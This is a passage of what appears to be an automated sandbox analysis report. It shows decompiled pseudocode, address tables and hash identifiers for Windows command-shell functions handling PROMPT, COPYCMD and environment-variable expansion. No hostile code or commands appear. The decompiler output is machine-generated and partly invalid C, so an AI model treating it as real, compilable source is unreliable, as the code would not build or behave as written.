							_t136 = _t135 >> 1;
							_t55 = _t162 + 2; // 0x4
							_t166 = _t55;
							do {
								_t177 =  *_t162;
								_t162 = _t162 + 2;
								__eflags = _t177;
							} while (_t177 != 0);
							_t165 = _t162 - _t166 >> 1;
							_t148 = _t165 + _t136 + 1;
							__eflags = _t165 + _t136 + 1 - 0x104;
							if(_t165 + _t136 + 1 > 0x104) {
								goto L35;
							}
							E4A5520A9(_t181,  &_v528, 0x104, _t181);
							goto L18;
						}
						__eflags = _t128 - 0x5c;
						if(_t128 == 0x5c) {
							goto L17;
						}
						goto L48;
					}
					L17:
					E4A55185A( &_v528, 0x104, _t181);
					goto L18;
				} else {
					goto L1;
				}
				do {
					L1:
					_t142 =  *_t143;
					_t143 = _t143 + 2;
				} while (_t142 != 0);
				goto L2;
			}


























































                                0x4a55b589
                                0x4a55b594
                                0x4a55b59b
                                0x4a55b5a6
                                0x4a55b5b3
                                0x4a55b5bc
                                0x4a55b5cb
                                0x4a55b5d7
                                0x4a55b5e8
                                0x4a55b5f3
                                0x4a55b5ff
                                0x4a55b5ff
                                0x4a55b601
                                0x4a55b601
                                0x4a55b604
                                0x4a55b604
                                0x4a55b608
                                0x4a55b609
                                0x4a55b60e
                                0x4a55b612
                                0x4a55b614
                                0x4a565dab
                                0x4a565dab
                                0x4a565db0
                                0x4a565db0
                                0x4a565db5
                                0x4a565db5
                                0x00000000
                                0x4a565db5
                                0x4a55b620
                                0x4a560ea7
                                0x4a560ea7
                                0x00000000
                                0x4a560ea7
                                0x4a55b626
                                0x4a55b628
                                0x4a55b628
                                0x4a55b62b
                                0x4a55b62b
                                0x4a55b62f
                                0x4a55b630
                                0x4a55b630
                                0x4a55b645
                                0x4a55b64b
                                0x4a55b650
                                0x4a55b656
                                0x4a55b65b
                                0x00000000
                                0x00000000
                                0x4a55b661
                                0x4a55b661
                                0x4a55b669
                                0x4a565dbd
                                0x4a565dc5
                                0x4a565dce
                                0x4a565dcf
                                0x4a565dd8
                                0x4a55b6e1
                                0x4a55b6e1
                                0x4a55b6f3
                                0x00000000
                                0x00000000
                                0x4a55b6f9
                                0x4a55b707
                                0x4a55b71c
                                0x4a55b720
                                0x4a560eb1
                                0x4a55b726
                                0x4a55b727
                                0x4a55b727
                                0x4a55b73c
                                0x4a55b740
                                0x4a55b740
                                0x4a55b752
                                0x4a55b752
                                0x4a55b757
                                0x4a55b76f
                                0x00000000
                                0x4a55b775
                                0x4a55b775
                                0x4a55b778
                                0x4a55b77e
                                0x4a55b784
                                0x4a55b78a
                                0x4a55b795
                                0x4a55b79c
                                0x4a565e64
                                0x4a565e66
                                0x4a565e66
                                0x4a565e67
                                0x4a565e6a
                                0x4a565e6a
                                0x4a565e6e
                                0x4a565e6f
                                0x4a565e6f
                                0x4a565e78
                                0x4a565e7a
                                0x4a565e7a
                                0x4a55b7a3
                                0x4a55b7ac
                                0x4a55fe19
                                0x4a55fe1b
                                0x4a55fe23
                                0x4a55fe24
                                0x4a55fe24
                                0x4a55b7ca
                                0x4a55b7cc
                                0x4a560ea0
                                0x4a560ea2
                                0x4a560ea2
                                0x4a560ebc
                                0x4a560ebc
                                0x4a560ec0
                                0x4a560ec1
                                0x4a560ec1
                                0x4a560ec6
                                0x4a560ec6
                                0x4a560eca
                                0x4a560ecc
                                0x4a560ece
                                0x4a560ed1
                                0x4a560ed1
                                0x4a560ed5
                                0x4a560ed6
                                0x4a560ed6
                                0x4a560edd
                                0x4a560edf
                                0x4a560ee3
                                0x4a560ee9
                                0x00000000
                                0x00000000
                                0x4a560ef0
                                0x4a560ef0
                                0x4a55b7e2
                                0x4a55b7e2
                                0x4a55b7b2
                                0x4a55b7b8
                                0x4a55b7bf
                                0x00000000
                                0x4a565e84
                                0x4a565e84
                                0x4a565e87
                                0x00000000
                                0x00000000
                                0x4a565e8d
                                0x00000000
                                0x4a565e8d
                                0x4a55b7bf
                                0x4a55b76f
                                0x4a55b679
                                0x00000000
                                0x00000000
                                0x4a55b67f
                                0x4a55b681
                                0x4a55b681
                                0x4a55b684
                                0x4a55b684
                                0x4a55b688
                                0x4a55b689
                                0x4a55b697
                                0x00000000
                                0x00000000
                                0x4a55b69d
                                0x4a55b69f
                                0x4a55b69f
                                0x4a55b6a2
                                0x4a55b6a2
                                0x4a55b6a6
                                0x4a55b6a7
                                0x4a55b6bc
                                0x4a55b6c1
                                0x4a55b6c9
                                0x4a565de4
                                0x4a565de8
                                0x4a565df4
                                0x4a565df4
                                0x4a565dfc
                                0x4a565e05
                                0x4a565e06
                                0x4a565e0d
                                0x4a565e0f
                                0x4a565e16
                                0x4a565e1c
                                0x4a565e1f
                                0x4a565e1f
                                0x4a565e23
                                0x4a565e24
                                0x4a565e24
                                0x4a565e29
                                0x4a565e29
                                0x4a565e2b
                                0x4a565e2d
                                0x4a565e2f
                                0x4a565e2f
                                0x4a565e32
                                0x4a565e32
                                0x4a565e36
                                0x4a565e37
                                0x4a565e37
                                0x4a565e3e
                                0x4a565e40
                                0x4a565e49
                                0x4a565e4b
                                0x00000000
                                0x00000000
                                0x4a565e5a
                                0x00000000
                                0x4a565e5a
                                0x4a565dea
                                0x4a565dee
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a565dee
                                0x4a55b6cf
                                0x4a55b6dc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55b5f5
                                0x4a55b5f5
                                0x4a55b5f5
                                0x4a55b5f9
                                0x4a55b5fa
                                0x00000000

                                APIs
                                  • Part of subcall function 4A55321B: _wcsnicmp.MSVCRT ref: 4A55329D
                                  • Part of subcall function 4A5522CA: iswspace.MSVCRT ref: 4A55238B
                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000104,00000002,00000002,00000005,00000000,00000002,00000002,00000000), ref: 4A55B77E
                                • GetFileAttributesW.KERNEL32(?,?), ref: 4A55B7A3
                                • GetLastError.KERNEL32 ref: 4A55B7B2
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$AttributesFile_wcsnicmpiswspace
                                • String ID: COPYCMD
                                • API String ID: 2247692152-3727491224
                                • Opcode ID: 8fc1e57e231bae3adc28d22c989449b9f6a7a1c28671a47aa174f0009761653f
                                • Instruction ID: 6ad8b6cb34cab4a11287647e9ec34bc31eaa84bda965e156c0b6f807ec705db3
                                • Opcode Fuzzy Hash: 8fc1e57e231bae3adc28d22c989449b9f6a7a1c28671a47aa174f0009761653f
                                • Instruction Fuzzy Hash: E4A17C75550216DBDB11AF24CE88AEB3BB8EF59300F024596E88ADF55DEB30DE41CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55C60C, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 267COMMON
                                Download Yara Rule
                                C-Code - Quality: 72%
                                			E4A55C60C(signed int __ebx, void* __edx, void* __edi, short* __esi, void* __eflags) {
				intOrPtr* _t85;
				void* _t90;
				signed short _t92;
				intOrPtr* _t95;
				signed int _t98;
				int _t99;
				int _t101;
				signed int _t104;
				signed int _t106;
				intOrPtr* _t109;
				signed int _t111;
				signed int _t112;
				intOrPtr* _t118;
				void* _t131;
				int _t134;
				void* _t135;
				signed short _t136;
				void* _t137;
				void* _t140;
				void* _t141;
				int _t142;
				int _t143;
				intOrPtr _t145;
				short* _t148;
				void* _t151;
				void* _t152;
				void* _t155;
				void* _t160;

				_t148 = __esi;
				_t140 = __edx;
				_t128 = __ebx;
				_push(0x278);
				_push(0x4a55c798);
				E4A5513E1(__ebx, __edi, __esi);
				_t147 = 0;
				 *(_t151 - 0x280) = 0;
				_t155 =  *0x4a5741b4 - _t147; // 0x0
				if(_t155 != 0) {
					_push(0);
					_push(0x2335);
					E4A551E6C(E4A5599E1(_t131));
				}
				__eflags =  *0x4a57408c - _t147; // 0x1
				if(__eflags == 0) {
					L31:
					return E4A5513CA(_t128, _t147, _t148);
				} else {
					__eflags =  *0x4a574110 - _t147; // 0x0
					if(__eflags == 0) {
						_push(0x4a5745a8);
						E4A5558F3();
					}
					__eflags =  *0x4a574085;
					if( *0x4a574085 != 0) {
						goto L1;
					} else {
						_t128 = E4A552070(L"PROMPT");
						 *(_t151 - 0x278) = _t128;
						__eflags = _t128 - _t147;
						if(_t128 == _t147) {
							L14:
							_t147 = 0x4a575260;
							E4A552C56(_t128, _t140, 0x4a575260, 0x4a575260, 0x104, 0x4a575260);
							 *((intOrPtr*)(_t151 - 0x274)) = 0x4a575e40;
							 *0x4a575e40 = 0;
							 *((intOrPtr*)(_t151 - 0x270)) = 0x3ff;
							if(_t128 == 0 ||  *_t128 == 0) {
								E4A55179D(0x4a575e40, 0x3ff, L"%s>", _t147);
								_t85 = 0x4a575e40;
								_t74 = _t85 + 2; // 0x4a575e42
								_t141 = _t74;
								do {
									_t134 =  *_t85;
									_t85 = _t85 + 2;
									__eflags = _t134;
								} while (_t134 != 0);
								_t148 = 0x4a575e40 + (_t85 - _t141 >> 1) * 2;
								goto L30;
							} else {
								while(1) {
									_t92 =  *_t128 & 0x0000ffff;
									if(_t92 == 0) {
										break;
									}
									if(_t92 != 0x24) {
										E4A55179D(0x4a575e40,  *((intOrPtr*)(_t151 - 0x270)), 0x4a5745b8, _t92 & 0x0000ffff);
										_t152 = _t152 + 0x10;
										_t95 = 0x4a575e40;
										_t27 = _t95 + 2; // 0x4a575e42
										_t135 = _t27;
										do {
											_t142 =  *_t95;
											_t95 = _t95 + 2;
											__eflags = _t142;
										} while (_t142 != 0);
										_t98 = _t95 - _t135 >> 1;
										_t148 = 0x4a575e40 + _t98 * 2;
										 *((intOrPtr*)(_t151 - 0x274)) = _t148;
										 *((intOrPtr*)(_t151 - 0x270)) =  *((intOrPtr*)(_t151 - 0x270)) - _t98;
										_t99 = E4A55661C();
										__eflags = _t99;
										if(_t99 == 0) {
											L38:
											 *(_t151 - 0x280) =  *(_t151 - 0x280) & 0x00000000;
											L29:
											 *(_t151 - 0x278) =  *(_t151 - 0x278) + 2;
											_t128 =  *(_t151 - 0x278);
											continue;
										}
										_t101 = E4A56EAC4( *_t128 & 0x0000ffff);
										__eflags = _t101;
										if(_t101 == 0) {
											goto L38;
										}
										 *(_t151 - 0x280) =  *_t128 & 0x0000ffff;
										goto L29;
									}
									 *(_t151 - 0x278) = _t128 + 2;
									_t128 = 0;
									_t160 =  *0x4a574dc0 - _t128; // 0x50
									if(_t160 == 0) {
										L22:
										_t104 = _t128 * 6;
										if( *((short*)(0x4a574dc0 + _t104)) == 0) {
											break;
										}
										_t14 = _t104 + 0x4a574dc2; // 0x45000000
										_t136 =  *_t14 & 0x0000ffff;
										if(_t136 != 8) {
											_t106 = (_t136 & 0x0000ffff) - 1;
											__eflags = _t106 - 9;
											if(_t106 > 9) {
												L72:
												E4A55179D(_t148,  *((intOrPtr*)(_t151 - 0x270)), 0x4a5745b8,  *0x4a575260 & 0x0000ffff);
												_t152 = _t152 + 0x10;
												_t109 = _t148;
												_t73 = _t109 + 2; // 0x4a575e42
												_t137 = _t73;
												while(1) {
													_t143 =  *_t109;
													_t109 = _t109 + 2;
													__eflags = _t143;
													if(_t143 == 0) {
														break;
													}
												}
												L26:
												_t111 = _t109 - _t137;
												L27:
												_t112 = _t111 >> 1;
												L28:
												_t148 = _t148 + _t112 * 2;
												 *((intOrPtr*)(_t151 - 0x270)) =  *((intOrPtr*)(_t151 - 0x270)) - _t112;
												 *((intOrPtr*)(_t151 - 0x274)) = _t148;
												goto L29;
											}
											switch( *((intOrPtr*)(_t106 * 4 +  &M4A55CAEA))) {
												case 0:
													__eax = E4A55D701(__esi, 0, 1, __esi,  *(__ebp - 0x270));
													goto L28;
												case 1:
													__eax = E4A56270D(0, 1, __esi,  *(__ebp - 0x270));
													goto L28;
												case 2:
													E4A55179D(_t148,  *((intOrPtr*)(_t151 - 0x270)), E4A552CB4, 0x4a575260);
													_t152 = _t152 + 0x10;
													_t114 = _t148;
													_t5 = _t114 + 2; // 0x4a575e42
													_t137 = _t5;
													do {
														_t144 =  *_t114;
														_t114 = _t114 + 2;
														__eflags = _t144;
													} while (_t144 != 0);
													goto L26;
												case 3:
													__ebp - 0x64 = E4A55D3B3(__ebp - 0x64, 0x20);
													__eax = __ebp - 0x64;
													__edi = E4A55C56B(__ecx, 0x2350, __ebp - 0x64);
													E4A55179D(__esi,  *(__ebp - 0x270), E4A552CB4, __edi) = LocalFree(__edi);
													__eax = __esi;
													_t41 = __eax + 2; // 0x4a575e42
													__ecx = _t41;
													while(1) {
														__dx =  *__eax;
														__eax = __eax + 1;
														__eax = __eax + 1;
														__eflags = __dx;
														if(__dx == 0) {
															goto L26;
														}
													}
													goto L26;
												case 4:
													__eflags =  *((short*)(__ebp - 0x280));
													if( *((short*)(__ebp - 0x280)) == 0) {
														_push(0x4a590758);
													} else {
														_push(0x4a590760);
													}
													_push( *(__ebp - 0x270));
													_push(__esi);
													__eax = E4A55185A();
													__eax = __esi;
													_t44 = __eax + 2; // 0x4a575e42
													__edx = _t44;
													do {
														__cx =  *__eax;
														__eax = __eax + 1;
														__eax = __eax + 1;
														__eflags = __cx;
													} while (__cx != 0);
													goto L49;
												case 5:
													__eax = E4A55185A(__esi,  *(__ebp - 0x270), 0x4a5745a8);
													__eax = __esi;
													_t46 = __eax + 2; // 0x4a575e42
													__ecx = _t46;
													while(1) {
														__dx =  *__eax;
														__eax = __eax + 1;
														__eax = __eax + 1;
														__eflags = __dx;
														if(__dx == 0) {
															goto L26;
														}
													}
													goto L26;
												case 6:
													goto L72;
												case 7:
													__eflags =  *0x4a574081;
													if( *0x4a574081 == 0) {
														goto L29;
													}
													__eax = L4A56F169();
													__al = __al - 0x28;
													 *__eax =  *__eax + __eax;
													while(1) {
														__eflags =  *(__ebp - 0x270) - 1;
														if( *(__ebp - 0x270) <= 1) {
															goto L29;
														}
														__ecx = __eax;
														__eax = __eax - 1;
														__eflags = __ecx;
														if(__ecx == 0) {
															goto L29;
														}
														_push(0x2b);
														_pop(__ecx);
														 *__esi = __cx;
														__esi = __esi + 1;
														__esi = __esi + 1;
														 *(__ebp - 0x274) = __esi;
														_t48 = __ebp - 0x270;
														 *_t48 =  *(__ebp - 0x270) - 1;
														__eflags =  *_t48;
													}
													goto L29;
												case 8:
													__eflags =  *0x4a574081;
													if( *0x4a574081 == 0) {
														goto L29;
													}
													__ax =  *0x4a575260;
													asm("pushad");
													_push(__edx);
													_push(__edi);
													__edx = __edx - 1;
													 *(__ebp - 0x24) = __ax;
													__ax =  *0x4a575262; // 0x0
													 *(__ebp - 0x22) = __ax;
													_push(0x5c);
													_pop(__eax);
													 *(__ebp - 0x20) = __ax;
													__eax = 0;
													 *(__ebp - 0x1e) = __ax;
													__eax = __ebp - 0x24;
													__eax = GetDriveTypeW(__ebp - 0x24);
													__eflags = __eax - 4;
													if(__eax != 4) {
														goto L29;
													}
													__eax = 0;
													 *(__ebp - 0x20) = __ax;
													 *(__ebp - 0x284) = 0x104;
													 *(__ebp - 4) =  *(__ebp - 4) & 0;
													__eax = __ebp - 0x284;
													_push(__ebp - 0x284);
													__eax = __ebp - 0x26c;
													_push(__ebp - 0x26c);
													__eax = __ebp - 0x24;
													_push(__eax);
													L4A5724C5();
													 *(__ebp - 0x27c) = __eax;
													 *(__ebp - 4) = 0xfffffffe;
													__eflags =  *(__ebp - 0x27c);
													if( *(__ebp - 0x27c) == 0) {
														__ebp - 0x26c = E4A55179D(__esi,  *(__ebp - 0x270), "%s ", __ebp - 0x26c);
														__eax = __esi;
														__edx = __eax + 2;
														while(1) {
															__cx =  *__eax;
															__eax = __eax + 1;
															__eax = __eax + 1;
															__eflags = __cx;
															if(__cx == 0) {
																break;
															}
														}
														L49:
														__eax = __eax - __edx;
														goto L27;
													}
													__eflags =  *(__ebp - 0x27c) - 0x8ca;
													if( *(__ebp - 0x27c) == 0x8ca) {
														goto L29;
													}
													_push(L"Unknown");
													_push( *(__ebp - 0x270));
													_push(__esi);
													__eax = E4A55179D();
													__esp = __esp + 0xc;
													__eax = __esi;
													__edx = __eax + 2;
													while(1) {
														__cx =  *__eax;
														__eax = __eax + 1;
														__eax = __eax + 1;
														__eflags = __cx;
														if(__cx == 0) {
															goto L49;
														}
													}
													goto L49;
											}
										}
										_t15 = _t104 + 0x4a574dc4; // 0x8004500
										E4A55179D(_t148,  *((intOrPtr*)(_t151 - 0x270)), 0x4a5745b8,  *_t15 & 0x0000ffff);
										_t152 = _t152 + 0x10;
										_t118 = _t148;
										_t17 = _t118 + 2; // 0x4a575e42
										_t137 = _t17;
										do {
											_t145 =  *_t118;
											_t118 = _t118 + 2;
										} while (_t145 != 0);
										goto L26;
									}
									_t147 = 0x4a574dc0;
									while(towupper( *( *(_t151 - 0x278)) & 0x0000ffff) !=  *_t147) {
										_t128 = _t128 + 1;
										_t12 = 0x4a574dc0 + _t128 * 6; // 0x4a574dc1
										_t147 = _t12;
										if( *_t147 != 0) {
											continue;
										}
										goto L22;
									}
									goto L22;
								}
								L30:
								 *_t148 = 0;
								_t90 = E4A55C5A0(0x4a575e40);
								__eflags =  *0x4a5741b4;
								if( *0x4a5741b4 != 0) {
									E4A551E6C(_t90);
								}
								goto L31;
							}
						}
						E4A55185A(0x4a575480, 0x200, _t128);
						_t128 = 0x4a575480;
						 *0x4a574085 = 1;
						L13:
						 *(_t151 - 0x278) = _t128;
						goto L14;
					}
				}
				L1:
				_t128 = 0x4a575480;
				goto L13;
			}































                                0x4a55c60c
                                0x4a55c60c
                                0x4a55c60c
                                0x4a55c60c
                                0x4a55c611
                                0x4a55c616
                                0x4a55c61b
                                0x4a55c61d
                                0x4a55c623
                                0x4a55c629
                                0x4a55c7d6
                                0x4a55c7d7
                                0x4a55c7e3
                                0x4a55c7e3
                                0x4a55c62f
                                0x4a55c635
                                0x4a55c7d0
                                0x4a55c7d5
                                0x4a55c63b
                                0x4a55c63b
                                0x4a55c641
                                0x4a55c643
                                0x4a55c648
                                0x4a55c64d
                                0x4a55c64e
                                0x4a55c655
                                0x00000000
                                0x4a55c65b
                                0x4a55c665
                                0x4a55c667
                                0x4a55c66d
                                0x4a55c66f
                                0x4a55c691
                                0x4a55c697
                                0x4a55c69d
                                0x4a55c6a7
                                0x4a55c6af
                                0x4a55c6ba
                                0x4a55c6c2
                                0x4a55cab9
                                0x4a55cac1
                                0x4a55cac3
                                0x4a55cac3
                                0x4a55cac6
                                0x4a55cac6
                                0x4a55caca
                                0x4a55cacb
                                0x4a55cacb
                                0x4a55cad4
                                0x00000000
                                0x4a55c6d2
                                0x4a55c6d2
                                0x4a55c6d2
                                0x4a55c6d8
                                0x00000000
                                0x00000000
                                0x4a55c6e2
                                0x4a55c7fd
                                0x4a55c802
                                0x4a55c805
                                0x4a55c807
                                0x4a55c807
                                0x4a55c80a
                                0x4a55c80a
                                0x4a55c80e
                                0x4a55c80f
                                0x4a55c80f
                                0x4a55c816
                                0x4a55c818
                                0x4a55c81b
                                0x4a55c821
                                0x4a55c827
                                0x4a55c82c
                                0x4a55c82e
                                0x4a55c84b
                                0x4a55c84b
                                0x4a55c786
                                0x4a55c786
                                0x4a55c78d
                                0x00000000
                                0x4a55c78d
                                0x4a55c834
                                0x4a55c839
                                0x4a55c83b
                                0x00000000
                                0x00000000
                                0x4a55c840
                                0x00000000
                                0x4a55c840
                                0x4a55c6ea
                                0x4a55c6f0
                                0x4a55c6f2
                                0x4a55c6f9
                                0x4a55c728
                                0x4a55c72a
                                0x4a55c735
                                0x00000000
                                0x00000000
                                0x4a55c737
                                0x4a55c737
                                0x4a55c742
                                0x4a55c5c9
                                0x4a55c5ca
                                0x4a55c5cd
                                0x4a55ca80
                                0x4a55ca94
                                0x4a55ca99
                                0x4a55ca9c
                                0x4a55ca9e
                                0x4a55ca9e
                                0x4a55caa1
                                0x4a55caa1
                                0x4a55caa5
                                0x4a55caa6
                                0x4a55caa9
                                0x00000000
                                0x00000000
                                0x4a55caaf
                                0x4a55c773
                                0x4a55c773
                                0x4a55c775
                                0x4a55c775
                                0x4a55c777
                                0x4a55c777
                                0x4a55c77a
                                0x4a55c780
                                0x00000000
                                0x4a55c780
                                0x4a55c5d3
                                0x00000000
                                0x4a55c862
                                0x00000000
                                0x00000000
                                0x4a55c877
                                0x00000000
                                0x00000000
                                0x4a55c5eb
                                0x4a55c5f0
                                0x4a55c5f3
                                0x4a55c5f5
                                0x4a55c5f5
                                0x4a55c5f8
                                0x4a55c5f8
                                0x4a55c5fc
                                0x4a55c5fd
                                0x4a55c5fd
                                0x00000000
                                0x00000000
                                0x4a55c887
                                0x4a55c88c
                                0x4a55c89a
                                0x4a55c8b2
                                0x4a55c8b8
                                0x4a55c8ba
                                0x4a55c8ba
                                0x4a55c8bd
                                0x4a55c8bd
                                0x4a55c8c0
                                0x4a55c8c1
                                0x4a55c8c2
                                0x4a55c8c5
                                0x00000000
                                0x00000000
                                0x4a55c8cb
                                0x00000000
                                0x00000000
                                0x4a55c8cd
                                0x4a55c8d5
                                0x4a55c8de
                                0x4a55c8d7
                                0x4a55c8d7
                                0x4a55c8d7
                                0x4a55c8e3
                                0x4a55c8e9
                                0x4a55c8ea
                                0x4a55c8ef
                                0x4a55c8f1
                                0x4a55c8f1
                                0x4a55c8f4
                                0x4a55c8f4
                                0x4a55c8f7
                                0x4a55c8f8
                                0x4a55c8f9
                                0x4a55c8f9
                                0x00000000
                                0x00000000
                                0x4a55c911
                                0x4a55c916
                                0x4a55c918
                                0x4a55c918
                                0x4a55c91b
                                0x4a55c91b
                                0x4a55c91e
                                0x4a55c91f
                                0x4a55c920
                                0x4a55c923
                                0x00000000
                                0x00000000
                                0x4a55c929
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55c92b
                                0x4a55c932
                                0x00000000
                                0x00000000
                                0x4a55c938
                                0x4a55c939
                                0x4a55c93b
                                0x4a55c95e
                                0x4a55c95e
                                0x4a55c965
                                0x00000000
                                0x00000000
                                0x4a55c93f
                                0x4a55c941
                                0x4a55c942
                                0x4a55c944
                                0x00000000
                                0x00000000
                                0x4a55c94a
                                0x4a55c94c
                                0x4a55c94d
                                0x4a55c950
                                0x4a55c951
                                0x4a55c952
                                0x4a55c958
                                0x4a55c958
                                0x4a55c958
                                0x4a55c958
                                0x00000000
                                0x00000000
                                0x4a55c96d
                                0x4a55c974
                                0x00000000
                                0x00000000
                                0x4a55c97a
                                0x4a55c97c
                                0x4a55c97d
                                0x4a55c97e
                                0x4a55c97f
                                0x4a55c980
                                0x4a55c984
                                0x4a55c98a
                                0x4a55c98e
                                0x4a55c990
                                0x4a55c991
                                0x4a55c995
                                0x4a55c997
                                0x4a55c99b
                                0x4a55c99f
                                0x4a55c9a5
                                0x4a55c9a8
                                0x00000000
                                0x00000000
                                0x4a55c9ae
                                0x4a55c9b0
                                0x4a55c9b4
                                0x4a55c9be
                                0x4a55c9c1
                                0x4a55c9c7
                                0x4a55c9c8
                                0x4a55c9ce
                                0x4a55c9cf
                                0x4a55c9d2
                                0x4a55c9d3
                                0x4a55c9d8
                                0x4a55c9de
                                0x4a55ca0e
                                0x4a55ca15
                                0x4a55ca63
                                0x4a55ca6b
                                0x4a55ca6d
                                0x4a55ca70
                                0x4a55ca70
                                0x4a55ca73
                                0x4a55ca74
                                0x4a55ca75
                                0x4a55ca78
                                0x00000000
                                0x00000000
                                0x4a55ca7e
                                0x4a55c8fe
                                0x4a55c8fe
                                0x00000000
                                0x4a55c8fe
                                0x4a55ca17
                                0x4a55ca21
                                0x00000000
                                0x00000000
                                0x4a55ca27
                                0x4a55ca2c
                                0x4a55ca32
                                0x4a55ca33
                                0x4a55ca38
                                0x4a55ca3b
                                0x4a55ca3d
                                0x4a55ca40
                                0x4a55ca40
                                0x4a55ca43
                                0x4a55ca44
                                0x4a55ca45
                                0x4a55ca48
                                0x00000000
                                0x00000000
                                0x4a55ca4e
                                0x00000000
                                0x00000000
                                0x4a55c5d3
                                0x4a55c748
                                0x4a55c75c
                                0x4a55c761
                                0x4a55c764
                                0x4a55c766
                                0x4a55c766
                                0x4a55c769
                                0x4a55c769
                                0x4a55c76d
                                0x4a55c76e
                                0x00000000
                                0x4a55c769
                                0x4a55c6fb
                                0x4a55c700
                                0x4a55c716
                                0x4a55c71c
                                0x4a55c71c
                                0x4a55c726
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55c726
                                0x00000000
                                0x4a55c700
                                0x4a55c7b4
                                0x4a55c7b6
                                0x4a55c7be
                                0x4a55c7c3
                                0x4a55c7ca
                                0x4a55cae0
                                0x4a55cae0
                                0x00000000
                                0x4a55c7ca
                                0x4a55c6c2
                                0x4a55c67d
                                0x4a55c682
                                0x4a55c684
                                0x4a55c68b
                                0x4a55c68b
                                0x00000000
                                0x4a55c68b
                                0x4a55c655
                                0x4a55c1d3
                                0x4a55c1d3
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: towupper
                                • String ID: %s>$PROMPT
                                • API String ID: 2392615415-196086063
                                • Opcode ID: afefffd43a5010ee3a9a05c55b654b1b35d0aa03c851e104182238245306ce05
                                • Instruction ID: 043f34ad5aedd1ba04e2348854eab5f124070801857872351ae47ff65345de87
                                • Opcode Fuzzy Hash: afefffd43a5010ee3a9a05c55b654b1b35d0aa03c851e104182238245306ce05
                                • Instruction Fuzzy Hash: 51915B75810122EADB16AB64CF88AB93AF8FF91301F01009BE949FF55DEB758B85C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A551EC6, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E4A551EC6(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				int _t36;
				void _t37;
				signed int _t40;
				signed int _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;
				void* _t52;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t66;
				signed int _t70;
				void* _t71;
				signed int _t73;
				void* _t74;
				void* _t76;
				signed int _t77;
				signed int _t85;
				void* _t89;
				signed int _t90;
				void _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				void* _t101;
				signed int _t103;
				signed short* _t105;

				_t74 = __ecx;
				_push(__esi);
				_t36 = E4A551896(0x4002);
				_t103 = _t36;
				_v16 = _t103;
				if(_t103 == 0) {
					_t37 = memset(0x4a58c640, _t36, 0x4006);
					 *0x4a574194 = 0x4a58c642;
					L35:
					_push(0xffffffff);
					_push(0x4a574ac0);
					L36:
					__imp__longjmp();
					L37:
					_push(_t37);
					 *0x4a58c642 = _t37;
					E4A556D44(_t74);
					_t74 = 0x233f;
					L40:
					_t37 = E4A55142E(_v16);
					goto L35;
				}
				E4A55185A(_t103, 0x2001,  *0x4a574194);
				_t40 =  *_t103 & 0x0000ffff;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				if(_t40 != 0) {
					_push(__ebx);
					_push(__edi);
					while(1) {
						_t89 = 2;
						_t105 = _t103 + _t89;
						if(_v8 > 0x2001) {
							break;
						}
						_t97 = 0x25;
						if(_t40 == _t97) {
							_t70 =  *0x4a5740b4; // 0x0
							__eflags = _t70;
							if(__eflags == 0) {
								_t71 = 0x4a574ac0;
								goto L15;
							} else {
								_t51 =  *_t105 & 0x0000ffff;
								__eflags = _t51 - _t97;
								if(_t51 == _t97) {
									_t52 =  *0x4a574194; // 0x0
									 *_t52 = _t97;
									 *0x4a574194 =  *0x4a574194 + _t89;
									_t103 = _t105 + _t89;
									__eflags = _t103;
									goto L31;
								} else {
									__eflags =  *0x4a574081;
									if( *0x4a574081 == 0) {
										L14:
										_t71 = 0x4a574ac0;
										_t43 = E4A555129(0x4a574ac0, _t105,  &_v12, L"0123456789", _t70 + 0x3c);
										__eflags = _t43;
										if(__eflags != 0) {
											L16:
											_t77 = _t43;
											_t13 = _t77 + 2; // 0x2
											_t98 = _t13;
											do {
												_t90 =  *_t77;
												_t77 = _t77 + 2;
												__eflags = _t90;
											} while (_t90 != 0);
											_t80 = _t77 - _t98 >> 1;
											_t99 = _t77 - _t98 >> 1;
											_v8 = _v8 + _t99;
											__eflags = _v8 - 0x2001;
											if(_v8 > 0x2001) {
												_push(0);
												E4A556D44(_t80);
												_t74 = 0x233f;
												_t37 = E4A55142E(_v16);
												_push(0xffffffff);
												_push(_t71);
												goto L36;
											}
											_t47 =  *0x4a574194; // 0x0
											__eflags = 0x2003;
											E4A55185A(_t47, 0x2003 - (_t47 - 0x4a58c640 >> 1), _t43);
											_t49 =  *0x4a574194; // 0x0
											 *0x4a574194 = _t49 + _t99 * 2;
											goto L20;
										} else {
											L15:
											_t43 = E4A555291(_t71, _t97, _t105, __eflags, _t71, _t105,  &_v12, _t97);
											__eflags = _t43;
											if(_t43 == 0) {
												__eflags =  *0x4a5740b4;
												if( *0x4a5740b4 != 0) {
													L20:
													_t103 =  &(_t105[_v12]);
												} else {
													_t45 =  *0x4a574194; // 0x0
													 *_t45 = _t97;
													 *0x4a574194 =  *0x4a574194 + 2;
													L31:
													_v8 = _v8 + 1;
												}
												goto L6;
											} else {
												goto L16;
											}
										}
									} else {
										__eflags = _t51 - 0x2a;
										if(_t51 == 0x2a) {
											_t103 = _t105 + _t89;
											__eflags =  *(_t70 + 0x34);
